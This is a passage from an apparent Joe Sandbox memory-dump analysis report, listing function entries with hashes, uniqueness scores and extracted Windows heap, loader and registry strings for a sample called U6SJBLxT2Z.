                                                                                                                                                                                                  • Instruction Fuzzy Hash: A461A076D41228ABDB20DF54DC98BE9B7F8AB14724F4101E5EA08BB250DB74DE84CF90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • HEAP: , xrefs: 328EE442
                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 328EE435
                                                                                                                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 328EE455
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                                  • API String ID: 0-1340214556
                                                                                                                                                                                                  • Opcode ID: a8b1d17d5f43a460c725fd658d4aeb5ac6c04f3778e32deed081df69d273c2a7
                                                                                                                                                                                                  • Instruction ID: 45a8484f3a714ec2cf53bce74a78fc09b8af244d3f80e8c5713354959d5e725d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8b1d17d5f43a460c725fd658d4aeb5ac6c04f3778e32deed081df69d273c2a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E51223D600784AFF316CBA8C884F9ABBF8FF05754F4440A4E9658B692DB74E940CB90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • HEAP: , xrefs: 3293D79F
                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 3293D792
                                                                                                                                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3293D7B2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                                  • API String ID: 0-3815128232
                                                                                                                                                                                                  • Opcode ID: f9ea56fd8378b60cb287a6789e0a3b5116b7cca4a79571f463cb4bc836325c3a
                                                                                                                                                                                                  • Instruction ID: 129d842de54e8c4813a5b6f2512e3ccc45b4bc7aa2a923f2a48418f18e38dc22
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9ea56fd8378b60cb287a6789e0a3b5116b7cca4a79571f463cb4bc836325c3a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB5127BD1023508AF366CA29C86477273E6EF4538CF50488DE6E6CB285DA36D847DB71
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • SXS: %s() passed the empty activation context data, xrefs: 32902808
                                                                                                                                                                                                  • RtlCreateActivationContext, xrefs: 32902803
                                                                                                                                                                                                  • Actx , xrefs: 328C32CC
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                                                  • API String ID: 0-859632880
                                                                                                                                                                                                  • Opcode ID: 7168a4e6f39ec6628123607f04f299f52d76943be6a819baf5ba7d5d2d51df2c
                                                                                                                                                                                                  • Instruction ID: 8d065a7574f47fe1c48dc10be2dd81069466503435bae233632a62b361d29841
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7168a4e6f39ec6628123607f04f299f52d76943be6a819baf5ba7d5d2d51df2c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6231167AA00319AFEB05CF68E8D0F9677A4EB44718F148469ED059F281CF74E846CBD0
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • @, xrefs: 3291B2F0
                                                                                                                                                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3291B2B2
                                                                                                                                                                                                  • GlobalFlag, xrefs: 3291B30F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                                  • API String ID: 0-4192008846
                                                                                                                                                                                                  • Opcode ID: f05ddaf9f680df60a5ace4162794621733eba874a342bbcb254d3b23bf49e0bd
                                                                                                                                                                                                  • Instruction ID: 134b82329bef398e76253f8db5b90435b7d2462cc09e1f10c7b547d8966c182a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f05ddaf9f680df60a5ace4162794621733eba874a342bbcb254d3b23bf49e0bd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21316DB5D0120DAEEB00DF99DC90BEEBBBDEF04344F400469E615AB241DB74AE058B90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • BuildLabEx, xrefs: 328D122F
                                                                                                                                                                                                  • @, xrefs: 328D11C5
                                                                                                                                                                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 328D119B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                  • API String ID: 0-3051831665
                                                                                                                                                                                                  • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                  • Instruction ID: 2bf9cda5e69a3afdc3bd0419c689c34fd6e70dbebead61ce993a562f416de394
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B31707A900619BBEB11DB99CC40FEFBBBDEF84B54F004025E514A7260DB71DA09CB90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                                  • Opcode ID: fc8221dd1d72291cafb9111fd75162489b189ac4e54bac0429ee685b3ae89a73
                                                                                                                                                                                                  • Instruction ID: feff70987c647e8c6e9db229c060f2e960c9d7834d040da3404dea7a63ffde08
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc8221dd1d72291cafb9111fd75162489b189ac4e54bac0429ee685b3ae89a73
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3431DE39206B16FFE7469F24C940BCAFBA9BF84754F000025E91587A52DBB8E821CBD0
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • @, xrefs: 328C84B1
                                                                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 328C847E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: @$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                                                                                                                                                                                  • API String ID: 0-3559684138
                                                                                                                                                                                                  • Opcode ID: 2cf00a430728bc3f03de7ef3f1566fcfb1e77ab02ef3f09039b259f3b5a7f603
                                                                                                                                                                                                  • Instruction ID: 0eeacb27dcc3b95679e12ecf51abda925c007159ebdf08dc63c057cdcd4da94a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cf00a430728bc3f03de7ef3f1566fcfb1e77ab02ef3f09039b259f3b5a7f603
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC91AC79548354AFE722CA24D840FABB7ECEF84784F444D2EFA8892151E774D948CB62
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                                                                                                  • Opcode ID: 3234f621635acb63870c07d63d80ffe266a9edcab41bf2f2be6852595bce9691
                                                                                                                                                                                                  • Instruction ID: 65c938f4806b51c694e086d52d6139c6341f90edb4e3c03add48c2922df62d61
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3234f621635acb63870c07d63d80ffe266a9edcab41bf2f2be6852595bce9691
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34615CB6A0030D9FDB14CFA8C840AADB7B9FF48744F50846AE599EB251EB70D944CF90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: $$$
                                                                                                                                                                                                  • API String ID: 3446177414-233714265
                                                                                                                                                                                                  • Opcode ID: 6d11a488bd849e4d95a2fb97fd7504a404e3b92ae0a4d652dd99586e3bd6b2ea
                                                                                                                                                                                                  • Instruction ID: 7b30ac22c3ebd0a07707fc46be9e22c6cd7276371ad6714511536f8afc31c3ad
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d11a488bd849e4d95a2fb97fd7504a404e3b92ae0a4d652dd99586e3bd6b2ea
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7661E0B9A01749DFEB20CFA8C5A0BADB7F1FF54708F104469D5196B680CFB6A941CB80
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                                  • API String ID: 0-118005554
                                                                                                                                                                                                  • Opcode ID: 913011488de3febd74e9b6cb486b45f9f46f847ace34e935d30812fde9e4f40c
                                                                                                                                                                                                  • Instruction ID: 4be8e9a76e80be7fbc72c2423c18b9dde4acba4397cd3e9659f556a3f7fda60a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 913011488de3febd74e9b6cb486b45f9f46f847ace34e935d30812fde9e4f40c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 213122792083889FE301CB69D854B2AB7E8EF88714F000869FC60CB385EF70D905CB56
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: .Local\$@
                                                                                                                                                                                                  • API String ID: 0-380025441
                                                                                                                                                                                                  • Opcode ID: 0af45645ab884b47747489b572e881eac92bddc4c38415fbe06e92374026559f
                                                                                                                                                                                                  • Instruction ID: ced9153283c193041e42132e8de3852f74f4ddb657c34f0cd1d3e2bfc20c3e3d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0af45645ab884b47747489b572e881eac92bddc4c38415fbe06e92374026559f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88319EBA509355AFD710DF28C8C0A5BFBE8EB89754F00092EF99483254DB34DD0ACB92
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3290289F
                                                                                                                                                                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 3290289A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                                  • API String ID: 0-2653619699
                                                                                                                                                                                                  • Opcode ID: 5314934d935e0a72c3b1c3dd215715f748523a120fb8b8769cb30a3d55b9d026
                                                                                                                                                                                                  • Instruction ID: 0f8223c48b5f8f8cbabf35c888815592b46d917b6c338bd48a5cb30a9489eca4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5314934d935e0a72c3b1c3dd215715f748523a120fb8b8769cb30a3d55b9d026
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC11067AF04218AFF71A8A48CC80F5AB7A8DB84754F14C069BE04DB244DB74DD0186A4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                                                                  • Opcode ID: 11e4ee6e83fd960206403f4b84a3a57e14cb4c7e4e5d9e3f00a6327d6f32ced3
                                                                                                                                                                                                  • Instruction ID: 2ece56898f638e3749bc64f7ae4adb670e2906da718f85a5e72dbf4b22fe4a4a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11e4ee6e83fd960206403f4b84a3a57e14cb4c7e4e5d9e3f00a6327d6f32ced3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B501F4B6155744EFE311CF54CD05B62B7E8EB40719F048979E658CBA90E734D904CB45
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: MUI
                                                                                                                                                                                                  • API String ID: 0-1339004836
                                                                                                                                                                                                  • Opcode ID: 483e6ad5988dbb56b1fddd598bba5b791435c2e69563f5a392f372bc0f67478d
                                                                                                                                                                                                  • Instruction ID: d4af68554562f0a7adf2c00745a8b3710afac6455421b4686ce8e6e8edeb7ab6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 483e6ad5988dbb56b1fddd598bba5b791435c2e69563f5a392f372bc0f67478d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4825ABDE003089FEB14CFA9C880BDDB7B5FF49358F50816AE819AB290DB719945CB54
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9c1d2dd9ba04e8e86c02b5ec99bebba1f9543274366001852291aab5534c51fa
                                                                                                                                                                                                  • Instruction ID: 9e8cba6b729f8265137efbddc00fe38778dffe2eb70e1c4a9abb44e922b9acde
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c1d2dd9ba04e8e86c02b5ec99bebba1f9543274366001852291aab5534c51fa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6E19E78609351CFD705CF28C090A9ABBE0FF89358F058A6DE99997351DB31E906CF92
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                                  • Opcode ID: c01a6fdbc86f261afb59181dd01a47b62e434b38cd9735e653ff74d0fe320aba
                                                                                                                                                                                                  • Instruction ID: 25619aa28a129c81ba7abffa8e16bf82b99a4519b6fac61156cfd32308a89860
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c01a6fdbc86f261afb59181dd01a47b62e434b38cd9735e653ff74d0fe320aba
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9B111B96093809FD354CF28C480A5AFBF1BF89744F18496EE89A87352D771E845CB82
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3006b69f3ccdb878157ca3434f204349ac727ee0685f5e1810f4cd14bdf160ff
                                                                                                                                                                                                  • Instruction ID: 2efbb67922df6a3f6520ec24052137deb5ae17a20aea3eac7b46861f32f86369
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3006b69f3ccdb878157ca3434f204349ac727ee0685f5e1810f4cd14bdf160ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB6152B9A01606AFDB08CF6CC880B9DFBB5BF48744F24826AD41DA7351DB71A951CB90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                                  • Opcode ID: 690da5cc3b0d2b565fb0e66b516ca9b0f1c84ecac1e2b0ad9080f92b8fdac14a
                                                                                                                                                                                                  • Instruction ID: 1e8ace921dbeb5d73d08b16014c54d86ceaea2f584618e6b6e6b271f366ad9a9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 690da5cc3b0d2b565fb0e66b516ca9b0f1c84ecac1e2b0ad9080f92b8fdac14a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5941137C6043858FE314CF28D894B6ABBEAFF81394F14482DE9599B2A0DF70D855CB91
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                                  • Opcode ID: de61b4071acb778bf54c4e5dae176c4d6b6104a82d0e50101818982e7cf4ce5a
